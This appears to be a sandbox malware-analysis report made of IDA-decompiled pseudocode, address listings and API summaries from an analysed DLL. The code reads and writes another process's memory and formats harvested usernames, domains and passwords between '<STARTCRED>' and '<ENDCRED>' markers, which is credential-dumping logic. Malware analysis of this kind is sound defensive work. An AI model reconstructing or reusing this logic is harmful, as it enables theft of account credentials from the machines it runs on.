								if( *((intOrPtr*)(_t161 + 4)) != _t157 ||  *((intOrPtr*)(_t161 + 0xc)) != _t157 ||  *(_t161 + 0x14) != _t157) {
									_t150 =  *0x1001f294; // 0xcaa50
									if(E10014BD0(_t161, _t150) != 0 && E10014DA0() != 0) {
										if((_t131 & 0x40000000) != 0) {
											_v32 = _t161;
										} else {
											_v28 = _t161;
										}
									}
									_t151 =  *0x1001f294; // 0xcaa50
									if(E10014BD0(_t161 + 8, _t151) != 0 && E10014DA0() != 0) {
										_t108 = _t161 + 8;
										if((_t131 & 0x40000000) != 0) {
											_v28 = _t108;
										} else {
											_v32 = _t108;
										}
									}
									_t152 =  *0x1001f294; // 0xcaa50
									if(E10014BD0(_t161 + 0x10, _t152) == 0) {
										L49:
										_t163 = _v32;
										goto L50;
									} else {
										if((_t131 & 0x10000000) == 0) {
											_t103 =  *0x1001f2f8; // 0x1001a788
											_t75 = _t103 + 0x10; // 0x1001d81c
											 *((intOrPtr*)( *((intOrPtr*)( *_t75))))( *(_t161 + 0x14),  *(_t161 + 0x12) & 0x0000ffff);
										}
										_t157 = _t161 + 0x10;
										if(_t157 == 0) {
											goto L49;
										} else {
											_t136 = _t157;
											if(E10014DA0() == 0) {
												goto L49;
											}
											_t99 =  *_t157 & 0x0000ffff;
											if(_t99 > 0x20) {
												goto L49;
											}
											_t163 = _v32;
											if((_t131 & 0x00400000) == 0) {
												_push("\n");
												_push(L"<ENDCRED>");
												_push(_t157);
												_push(L"<STARTPASS>");
												_push(_v28);
												_push(_t163);
												E10014340(_t136, L"%ls%wZ\\%wZ%ls%wZ%ls%ls", L"<STARTCRED>");
											} else {
												_push("\n");
												_push(L"<ENDCRED>");
												_push(_t157[2]);
												_push(_t99 >> 1);
												_push(L"<STARTPASS>");
												_push(_v28);
												_push(_t163);
												E10014340(_t136, L"%ls%wZ\\%wZ%ls%.*s%ls%ls", L"<STARTCRED>");
											}
											L50:
											_t93 = _v28;
											if(_t93 != 0) {
												_t93 = LocalFree( *(_t93 + 4));
											}
											if(_t163 != 0) {
												_t93 = LocalFree( *(_t163 + 4));
											}
											if(_t157 != 0) {
												_push(_t157[2]);
												L56:
												_t93 = LocalFree();
											}
											goto L57;
										}
									}
								} else {
									goto L57;
								}
							}
							_t111 =  *(__ecx + 0x14);
							if(_t111 == 0) {
								L25:
								_t93 = 0;
								 *(_t161 + 0x10) = 0;
								L26:
								 *(_t161 + 0x14) = _t93;
								goto L27;
							}
							_t112 = _t111 - 1;
							if(_t112 == 0) {
								 *(__ecx + 0x10) = 0;
								 *(__ecx + 0x14) = 0;
								_t114 =  *(__ecx + 0x18);
								_t153 =  *0x1001f294; // 0xcaa50
								_v18 = _t114;
								_v20 = _t114;
								_v16 =  *(__ecx + 0x1c);
								E10014BD0( &_v20, _t153);
								goto L25;
							}
							_t93 = _t112 - 1;
							if(_t93 != 0) {
								goto L27;
							}
							 *(__ecx + 0x10) =  *(__ecx + 0x18);
							_t93 =  *(__ecx + 0x1c);
							goto L26;
						}
						 *(__ecx + 0x10) =  *(__ecx + 0x14);
						_t93 =  *(__ecx + 0x18);
						goto L26;
					}
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						goto L57;
					}
					_t154 =  *0x1001f294; // 0xcaa50
					_t93 = E10014BD0(__ecx, _t154);
					if(0 == 0) {
						goto L57;
					}
					if((_t131 & 0x10000000) == 0) {
						_t119 =  *0x1001f2f8; // 0x1001a788
						_t31 = _t119 + 0x10; // 0x1001d81c
						 *((intOrPtr*)( *((intOrPtr*)( *_t31))))( *((intOrPtr*)(__ecx + 4)),  *(__ecx + 2) & 0x0000ffff);
					}
					_push( *((intOrPtr*)(_t161 + 4)));
					goto L56;
				} else {
					_t159 =  *((intOrPtr*)(__ecx + 4));
					_t93 = _t131 & 0x07000000;
					_v28 = _t93;
					if(_t159 != 0) {
						if(_t93 == 0x1000000) {
							_t124 = E10013630( *_v20);
							_t155 =  *_t124;
							_t145 =  *((intOrPtr*)(_t155 + _t159 + 4));
							if(_t145 != 0) {
								 *((intOrPtr*)(_t155 + _t159 + 4)) = _t145 + _t159;
							}
							_t146 =  *((intOrPtr*)(_t124 + 4));
							_t93 =  *(_t146 + _t159 + 4);
							if(_t93 != 0) {
								_t93 = _t93 + _t159;
								 *(_t146 + _t159 + 4) = _t93;
							}
						}
					}
					L57:
					if((_t131 & 0x00000002) != 0) {
						_t93 = _v24;
						if(_t93 != 0) {
							_t93 = LocalFree(_t93);
						}
					}
					goto L60;
				}
			}

































    0x10011d5b
    0x10011d5d
    0x10011d62
    0x10011d64
    0x10011d6c
    0x10011d6e
    0x10011d72
    0x10011d78
    0x10012032
    0x10012038
    0x10012038
    0x10011d86
    0x10011d8c
    0x10011d95
    0x10011e10
    0x10011e5a
    0x00000000
    0x00000000
    0x10011e66
    0x10011e79
    0x10011ecc
    0x10011ecf
    0x10011edf
    0x10011eee
    0x10011f01
    0x10011f09
    0x10011f03
    0x10011f03
    0x10011f03
    0x10011f01
    0x10011f0d
    0x10011f1d
    0x10011f2b
    0x10011f34
    0x10011f3c
    0x10011f36
    0x10011f36
    0x10011f36
    0x10011f34
    0x10011f40
    0x10011f50
    0x10011fef
    0x10011fef
    0x00000000
    0x10011f56
    0x10011f5c
    0x10011f5e
    0x10011f63
    0x10011f70
    0x10011f70
    0x10011f72
    0x10011f77
    0x00000000
    0x10011f79
    0x10011f79
    0x10011f82
    0x00000000
    0x00000000
    0x10011f84
    0x10011f8a
    0x00000000
    0x00000000
    0x10011f8c
    0x10011f96
    0x10011fc6
    0x10011fcb
    0x10011fd0
    0x10011fd1
    0x10011fd6
    0x10011fda
    0x10011fe5
    0x10011f98
    0x10011f98
    0x10011f9d
    0x10011fa2
    0x10011fa7
    0x10011fa8
    0x10011fad
    0x10011fb1
    0x10011fbc
    0x10011fc1
    0x10011ff3
    0x10011ff3
    0x10011ff9
    0x10011ffe
    0x10011ffe
    0x10012006
    0x1001200b
    0x1001200b
    0x10012013
    0x10012015
    0x10012018
    0x10012018
    0x10012018
    0x00000000
    0x10012013
    0x10011f77
    0x00000000
    0x00000000
    0x00000000
    0x10011ecf
    0x10011e7e
    0x10011e81
    0x10011ec4
    0x10011ec4
    0x10011ec6
    0x10011ec9
    0x10011ec9
    0x00000000
    0x10011ec9
    0x10011e83
    0x10011e86
    0x10011e9e
    0x10011ea1
    0x10011ea4
    0x10011ea8
    0x10011eae
    0x10011eb3
    0x10011ebb
    0x10011ebf
    0x00000000
    0x10011ebf
    0x10011e88
    0x10011e8b
    0x00000000
    0x00000000
    0x10011e90
    0x10011e93
    0x00000000
    0x10011e93
    0x10011e6b
    0x10011e6e
    0x00000000
    0x10011e6e
    0x10011e15
    0x00000000
    0x00000000
    0x10011e1b
    0x10011e23
    0x10011e2a
    0x00000000
    0x00000000
    0x10011e36
    0x10011e38
    0x10011e3d
    0x10011e4a
    0x10011e4a
    0x10011e4c
    0x00000000
    0x10011d97
    0x10011d97
    0x10011d9c
    0x10011da1
    0x10011da7
    0x10011dcf
    0x10011ddb
    0x10011de0
    0x10011de2
    0x10011de8
    0x10011dec
    0x10011dec
    0x10011df0
    0x10011df3
    0x10011df9
    0x10011dff
    0x10011e01
    0x10011e01
    0x10011df9
    0x10011dcf
    0x1001201e
    0x10012021
    0x10012023
    0x10012029
    0x1001202c
    0x1001202c
    0x10012029
    0x00000000
    0x10012021

    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 10011D86
      • Part of subcall function 10014BD0: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,10011EEC), ref: 10014C18
      • Part of subcall function 10014DA0: IsCharAlphaNumericW.USER32(?), ref: 10014DB9
      • Part of subcall function 10014DA0: IsTextUnicode.ADVAPI32(?,00000002,00000002), ref: 10014DCF
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000001FE,?,?,?,?,?,10011FEA,%ls%wZ\%wZ%ls%wZ%ls%ls,<STARTCRED>,?,?,<STARTPASS>,?,<ENDCRED>,1001DCC4), ref: 10014374
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000000FE), ref: 100143E1
      • Part of subcall function 10014340: LocalFree.KERNEL32(000D1378), ref: 10014403
    • LocalFree.KERNEL32(?), ref: 10011FFE
    • LocalFree.KERNEL32(?), ref: 1001200B
    • LocalFree.KERNEL32(?), ref: 10012018
    • LocalFree.KERNEL32(?), ref: 1001202C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10012980, Relevance: 18.2, APIs: 12, Instructions: 198fileinjection
    C-Code - Quality: 100%
    			E10012980(intOrPtr* __ecx, void* __edx) {
				void* _t57;
				void* _t59;
				void _t64;
				intOrPtr _t66;
				void _t69;
				void* _t75;
				int _t78;
				LONG* _t79;
				void* _t85;
				void* _t87;
				void* _t88;
				int _t90;
				void* _t100;
				void* _t103;
				void _t104;
				void* _t109;
				intOrPtr* _t110;
				int _t117;
				long _t120;
				intOrPtr* _t124;
				intOrPtr* _t125;
				void* _t126;
				void* _t127;

				_t100 = __edx;
				 *(_t126 + 0x20) = 0x1001f2d0;
				_t124 = __ecx;
				 *(_t126 + 0x28) = 0;
				 *((intOrPtr*)(_t126 + 0x1c)) = __ecx;
				_t120 = __edx + 8;
				 *(_t126 + 0x20) = _t126 + 0x14;
				 *(_t126 + 0x34) = 0x1001f2d0;
				_t57 = LocalAlloc(0x40, _t120);
				 *(_t126 + 0x28) = _t57;
				if(_t57 == 0) {
					return 0;
				} else {
					_t59 = E10014010(_t126 + 0x24, _t124, 4);
					_t127 = _t126 + 4;
					if(_t59 == 0) {
						L33:
						_t103 =  *(_t127 + 0x28);
						goto L34;
					} else {
						_t104 =  *(_t127 + 0x14);
						 *(_t127 + 0x20) = _t104;
						 *((intOrPtr*)(_t127 + 0x24)) =  *((intOrPtr*)(_t124 + 4));
						if(_t104 ==  *_t124) {
							goto L33;
						} else {
							_t125 =  *((intOrPtr*)(_t127 + 0x3c));
							_t103 =  *(_t127 + 0x28);
							do {
								_t109 =  *(_t127 + 0x2c);
								_t117 = 0;
								 *(_t127 + 0x30) = 0;
								 *(_t127 + 0x34) = 0x1001f2d0;
								_t64 =  *_t109;
								if(_t64 == 0) {
									_t110 =  *((intOrPtr*)(_t127 + 0x24));
									_t66 =  *_t110;
									if(_t66 == 0) {
										E10010340(_t103,  *((intOrPtr*)(_t127 + 0x24)), _t120);
										_t103 =  *(_t127 + 0x34);
										_t127 = _t127 + 0xc;
										goto L28;
									} else {
										_t75 = _t66 - 1;
										if(_t75 == 0) {
											_t78 = ReadProcessMemory( *( *( *((intOrPtr*)(_t127 + 0x24)) + 4)),  *(_t127 + 0x2c), _t103, _t120, 0);
											goto L23;
										} else {
											_t79 = _t75 - 5;
											if(_t79 != 0) {
												goto L25;
											} else {
												if(SetFilePointer( *( *(_t110 + 4)),  *(_t127 + 0x28), _t79, _t79) == 0xffffffff) {
													goto L33;
												} else {
													_t78 = ReadFile( *( *( *(_t127 + 0x2c) + 4)),  *(_t127 + 0x34), _t120, _t127 + 0x1c, 0);
													goto L23;
												}
											}
										}
									}
								} else {
									_t85 = _t64 - 1;
									if(_t85 == 0) {
										if( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x24)))) != 0) {
											goto L13;
										} else {
											_t78 = WriteProcessMemory( *( *( *(_t127 + 0x2c) + 4)), _t103,  *(_t127 + 0x28), _t120, 0);
											goto L23;
										}
									} else {
										if(_t85 != 5) {
											L25:
											if(_t117 == 0) {
												L34:
												LocalFree(_t103);
												return 0;
											} else {
												L28:
												if( *_t125 !=  *((intOrPtr*)(_t103 + _t100))) {
													goto L30;
												} else {
													_t51 = _t100 + 4; // 0x0
													if( *((intOrPtr*)(_t125 + 4)) ==  *((intOrPtr*)(_t103 + _t51))) {
														LocalFree(_t103);
														return  *(_t127 + 0x20);
													} else {
														goto L30;
													}
												}
											}
										} else {
											if( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x24)))) != 0) {
												L13:
												_t87 = LocalAlloc(0x40, _t120);
												 *(_t127 + 0x30) = _t87;
												if(_t87 == 0) {
													goto L33;
												} else {
													_t88 = E10014010(_t127 + 0x34, _t127 + 0x24, _t120);
													_t127 = _t127 + 4;
													if(_t88 != 0) {
														_t90 = E10014010(_t127 + 0x2c, _t127 + 0x34, _t120);
														_t127 = _t127 + 4;
														_t117 = _t90;
													}
													LocalFree( *(_t127 + 0x30));
													goto L24;
												}
											} else {
												if(_t103 == 0 || SetFilePointer( *( *(_t109 + 4)), _t103, 0, 0) != 0) {
													_t24 =  *(_t127 + 0x34) + 4; // 0x0
													_t78 = WriteFile( *( *_t24),  *(_t127 + 0x2c), _t120, _t127 + 0x1c, 0);
													L23:
													_t117 = _t78;
													L24:
													_t103 =  *(_t127 + 0x28);
													goto L25;
												} else {
													goto L33;
												}
											}
										}
									}
								}
								goto L36;
								L30:
								_t69 =  *_t103;
								 *(_t127 + 0x20) = _t69;
							} while (_t69 !=  *( *(_t127 + 0x1c)));
							LocalFree(_t103);
							return 0;
						}
					}
				}
				L36:
			}


























    0x10012986
    0x10012988
    0x10012991
    0x10012993
    0x1001299f
    0x100129a3
    0x100129a6
    0x100129ad
    0x100129b5
    0x100129bb
    0x100129c1
    0x10012bc5
    0x100129c7
    0x100129cf
    0x100129d4
    0x100129d9
    0x10012ba5
    0x10012ba5
    0x00000000
    0x100129df
    0x100129df
    0x100129e6
    0x100129ea
    0x100129f1
    0x00000000
    0x100129f7
    0x100129f7
    0x100129fb
    0x10012a00
    0x10012a00
    0x10012a04
    0x10012a06
    0x10012a0a
    0x10012a14
    0x10012a16
    0x10012ad9
    0x10012adf
    0x10012ae2
    0x10012b4e
    0x10012b53
    0x10012b57
    0x00000000
    0x10012ae4
    0x10012ae4
    0x10012ae7
    0x10012b36
    0x00000000
    0x10012ae9
    0x10012ae9
    0x10012aec
    0x00000000
    0x10012aee
    0x10012b02
    0x00000000
    0x10012b08
    0x10012b1d
    0x00000000
    0x10012b1d
    0x10012b02
    0x10012aec
    0x10012ae7
    0x10012a1c
    0x10012a1c
    0x10012a1f
    0x10012a72
    0x00000000
    0x10012a74
    0x10012a85
    0x00000000
    0x10012a85
    0x10012a21
    0x10012a24
    0x10012b42
    0x10012b44
    0x10012ba9
    0x10012bac
    0x10012bbb
    0x10012b46
    0x10012b5a
    0x10012b60
    0x00000000
    0x10012b62
    0x10012b65
    0x10012b69
    0x10012b95
    0x10012ba4
    0x00000000
    0x00000000
    0x00000000
    0x10012b69
    0x10012b60
    0x10012a2a
    0x10012a30
    0x10012a90
    0x10012a93
    0x10012a99
    0x10012a9f
    0x00000000
    0x10012aa5
    0x10012aae
    0x10012ab3
    0x10012ab8
    0x10012ac3
    0x10012ac8
    0x10012acb
    0x10012acb
    0x10012ad1
    0x00000000
    0x10012ad1
    0x10012a32
    0x10012a34
    0x10012a5c
    0x10012a61
    0x10012b3c
    0x10012b3c
    0x10012b3e
    0x10012b3e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10012a34
    0x10012a30
    0x10012a24
    0x10012a1f
    0x00000000
    0x10012b6b
    0x10012b6f
    0x10012b71
    0x10012b75
    0x10012b80
    0x10012b8f
    0x10012b8f
    0x100129f1
    0x100129d9
    0x00000000

    APIs
    • LocalAlloc.KERNEL32(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100129B5
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • SetFilePointer.KERNEL32(00000006,?,00000000,00000000), ref: 10012A3E
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10012A61
    • WriteProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012A85
    • LocalAlloc.KERNEL32(00000040,?), ref: 10012A93
    • LocalFree.KERNEL32(?), ref: 10012AD1
    • SetFilePointer.KERNEL32(00000006,?,?,?), ref: 10012AF9
    • ReadFile.KERNEL32(00000006,1001F2D0,?,?,00000000), ref: 10012B1D
    • ReadProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012B36
    • LocalFree.KERNEL32(1001F2D0), ref: 10012B80
    • LocalFree.KERNEL32(1001F2D0), ref: 10012B95
    • LocalFree.KERNEL32(?), ref: 10012BAC
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100139B0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146
    C-Code - Quality: 73%
    			E100139B0(intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v28;
				void _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _t39;
				void* _t40;
				intOrPtr _t52;
				void* _t56;
				intOrPtr* _t61;
				short* _t63;
				short* _t71;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				short* _t84;
				intOrPtr _t86;
				long _t87;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t91;
				signed int _t92;
				void* _t94;

				_t94 = (_t92 & 0xfffffff8) - 0x1c;
				_t61 = _a4;
				_v12 = 0;
				_v8 = 0x1001f2d0;
				_t64 =  *_t61;
				_v20 = 0;
				_v16 =  *((intOrPtr*)( *_t61));
				if( *0x1001e578 != 0) {
					L2:
					_t86 =  *0x1001f2c8; // 0x20
					_t39 =  *0x1001f2cc; // 0x74ba7188
					_push( *((intOrPtr*)(_t61 + 8)));
					_v20 = _t39;
					_t87 = _t86 + 0x18;
					_t40 = E10012980( &_v20, 0x10);
					_v20 = _t40;
					if(_t40 == 0) {
						L26:
						return _t40;
					}
					_t40 = LocalAlloc(0x40, _t87);
					_v12 = _t40;
					if(_t40 == 0) {
						goto L26;
					}
					if(E10014010( &_v12,  &_v20, _t87) == 0) {
						L25:
						_t40 = LocalFree(_v12);
						goto L26;
					}
					_t89 =  *0x1001f2c8; // 0x20
					_t63 = 0;
					_t84 = 0;
					_v32 = 0;
					_v28 = 0;
					_t90 = _t89 + _v12;
					if(_t90 == 0) {
						goto L25;
					}
					 *0x1001f3a4( *((intOrPtr*)(_a4 + 0x20)),  &_v28);
					if( *((intOrPtr*)(_t90 + 4)) != 0 ||  *((intOrPtr*)(_t90 + 0xc)) != 0 ||  *((intOrPtr*)(_t90 + 0x14)) != 0) {
						_t78 =  *0x1001f294; // 0xcaa50
						if(E10014BD0(_t90, _t78) != 0) {
							E10014DA0();
							_t63 =  !=  ? _t90 : _t63;
						}
						_t79 =  *0x1001f294; // 0xcaa50
						_v32 = _t90 + 8;
						if(E10014BD0(_t90 + 8, _t79) != 0) {
							E10014DA0();
							_t74 =  !=  ? _v32 : 0;
							_v40 =  !=  ? _v32 : 0;
						}
						_t80 =  *0x1001f294; // 0xcaa50
						if(E10014BD0(_t90 + 0x10, _t80) == 0) {
							L18:
							_t91 = _v40;
							goto L19;
						} else {
							_t52 =  *0x1001f2f8; // 0x1001a788
							_t28 = _t52 + 0x10; // 0x1001d81c
							 *((intOrPtr*)( *((intOrPtr*)( *_t28))))( *((intOrPtr*)(_t90 + 0x14)),  *(_t90 + 0x12) & 0x0000ffff);
							_t84 = _t90 + 0x10;
							if(_t84 == 0) {
								goto L18;
							}
							_t71 = _t84;
							_t56 = E10014DA0();
							_t91 = _v48;
							if(_t56 != 0 &&  *_t84 <= 0x20) {
								_push("\n");
								_push(L"<ENDCRED>");
								_push(_t84);
								_push(L"<STARTPASS>");
								_push(_t63);
								_push(_t91);
								E10014340(_t71, L"%ls%wZ\\%wZ%ls%wZ%ls%ls", L"<STARTCRED>");
							}
							L19:
							if(_t63 != 0) {
								LocalFree( *(_t63 + 4));
							}
							if(_t91 != 0) {
								LocalFree( *(_t91 + 4));
							}
							if(_t84 != 0) {
								LocalFree( *(_t84 + 4));
							}
							goto L25;
						}
					} else {
						goto L25;
					}
				}
				_push(0x1001f2c8);
				_t40 = E10012BD0(_t64, 0x1001e560, 0x1001e5b0, 5, 0x1001f2cc, 0, _t64);
				_t94 = _t94 + 0x18;
				if(_t40 == 0) {
					goto L26;
				}
				goto L2;
			}





























    0x100139b6
    0x100139c1
    0x100139c5
    0x100139cd
    0x100139d5
    0x100139d7
    0x100139e2
    0x100139e6
    0x10013a11
    0x10013a11
    0x10013a1b
    0x10013a25
    0x10013a28
    0x10013a2c
    0x10013a2f
    0x10013a37
    0x10013a3d
    0x10013b98
    0x10013b9e
    0x10013b9e
    0x10013a46
    0x10013a4c
    0x10013a52
    0x00000000
    0x00000000
    0x10013a6b
    0x10013b8e
    0x10013b92
    0x00000000
    0x10013b92
    0x10013a71
    0x10013a77
    0x10013a79
    0x10013a7b
    0x10013a7f
    0x10013a83
    0x10013a87
    0x00000000
    0x00000000
    0x10013a98
    0x10013aa1
    0x10013ab1
    0x10013ac0
    0x10013ac4
    0x10013acb
    0x10013acb
    0x10013ace
    0x10013ad9
    0x10013ae4
    0x10013ae9
    0x10013af2
    0x10013af7
    0x10013af7
    0x10013afb
    0x10013b0b
    0x10013b63
    0x10013b63
    0x00000000
    0x10013b0d
    0x10013b0d
    0x10013b12
    0x10013b1f
    0x10013b21
    0x10013b26
    0x00000000
    0x00000000
    0x10013b28
    0x10013b2a
    0x10013b2f
    0x10013b35
    0x10013b3d
    0x10013b42
    0x10013b47
    0x10013b48
    0x10013b4d
    0x10013b4e
    0x10013b59
    0x10013b5e
    0x10013b67
    0x10013b69
    0x10013b6e
    0x10013b6e
    0x10013b76
    0x10013b7b
    0x10013b7b
    0x10013b83
    0x10013b88
    0x10013b88
    0x00000000
    0x10013b83
    0x00000000
    0x00000000
    0x00000000
    0x10013aa1
    0x100139e8
    0x10013a01
    0x10013a06
    0x10013a0b
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 10012980: LocalAlloc.KERNEL32(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100129B5
      • Part of subcall function 10012980: SetFilePointer.KERNEL32(00000006,?,00000000,00000000), ref: 10012A3E
      • Part of subcall function 10012980: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10012A61
      • Part of subcall function 10012980: WriteProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012A85
      • Part of subcall function 10012980: LocalAlloc.KERNEL32(00000040,?), ref: 10012A93
      • Part of subcall function 10012980: LocalFree.KERNEL32(?), ref: 10012AD1
      • Part of subcall function 10012980: SetFilePointer.KERNEL32(00000006,?,?,?), ref: 10012AF9
      • Part of subcall function 10012980: ReadFile.KERNEL32(00000006,1001F2D0,?,?,00000000), ref: 10012B1D
      • Part of subcall function 10012980: ReadProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012B36
      • Part of subcall function 10012980: LocalFree.KERNEL32(1001F2D0), ref: 10012B80
      • Part of subcall function 10012980: LocalFree.KERNEL32(1001F2D0), ref: 10012B95
      • Part of subcall function 10012980: LocalFree.KERNEL32(?), ref: 10012BAC
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 10013A46
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 10013A98
      • Part of subcall function 10014BD0: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,10011EEC), ref: 10014C18
    • LocalFree.KERNEL32(?), ref: 10013B88
      • Part of subcall function 10014DA0: IsCharAlphaNumericW.USER32(?), ref: 10014DB9
      • Part of subcall function 10014DA0: IsTextUnicode.ADVAPI32(?,00000002,00000002), ref: 10014DCF
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000001FE,?,?,?,?,?,10011FEA,%ls%wZ\%wZ%ls%wZ%ls%ls,<STARTCRED>,?,?,<STARTPASS>,?,<ENDCRED>,1001DCC4), ref: 10014374
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000000FE), ref: 100143E1
      • Part of subcall function 10014340: LocalFree.KERNEL32(000D1378), ref: 10014403
    • LocalFree.KERNEL32(?), ref: 10013B6E
    • LocalFree.KERNEL32(?), ref: 10013B7B
    • LocalFree.KERNEL32(?), ref: 10013B92
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100120C0, Relevance: 12.8, APIs: 10, Instructions: 303
    C-Code - Quality: 100%
    			E100120C0(void* __edx, void* __eflags) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				void** _v116;
				void* _v120;
				void** _v124;
				void* _v128;
				void** _v132;
				void* _v136;
				char _v140;
				void** _v144;
				signed char* _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _v168;
				intOrPtr _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				void _v188;
				signed int _v189;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t149;
				char _t150;
				intOrPtr _t152;
				void* _t155;
				void* _t157;
				void* _t160;
				intOrPtr _t180;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t189;
				void* _t190;
				void* _t194;
				void* _t196;
				void* _t197;
				void _t199;
				void* _t205;
				long _t207;
				void* _t208;
				long _t211;
				void* _t212;
				long _t215;
				void* _t216;
				signed int _t220;
				intOrPtr _t221;
				void _t223;
				long _t225;
				void* _t226;
				void* _t227;
				void* _t228;
				void* _t231;
				void* _t241;
				long* _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t256;
				void* _t257;

				_v180 = 1;
				_t256 = __edx;
				_v188 =  &_v180;
				_v184 = 0x1001f2d0;
				_t250 = 1;
				_v168 = 0;
				_v164 = 0x1001f2d0;
				_t145 = E100125F0();
				_t221 = _t145;
				_v160 = _t221;
				if(_t221 < 0) {
					return _t145;
				} else {
					_t146 =  *0x1001f2f8; // 0x1001a788
					_v108 = _t146;
					_t147 =  *0x1001f2a0; // 0x1db1
					_v112 = 0x1001f294;
					if(_t147 >= 0xbb8) {
						if(_t147 >= 0x1388) {
							if(_t147 >= 0x1b58) {
								if(_t147 >= 0x1f40) {
									_t249 =  >=  ? 0x1001a8c8 : 0x1001a89c;
								} else {
									_t249 = 0x1001a844;
								}
							} else {
								_t249 = 0x1001a818;
							}
						} else {
							_t249 = 0x1001a7ec;
						}
					} else {
						_t249 = 0x1001a7c0;
					}
					if(_t147 + 0xffffe4a8 <= 0x95f &&  *0x1001e318 > 0x53480000) {
						_t249 =  &(_t249[0xb]);
					}
					_t149 =  *0x1001f294; // 0xcaa50
					_v172 = _t149;
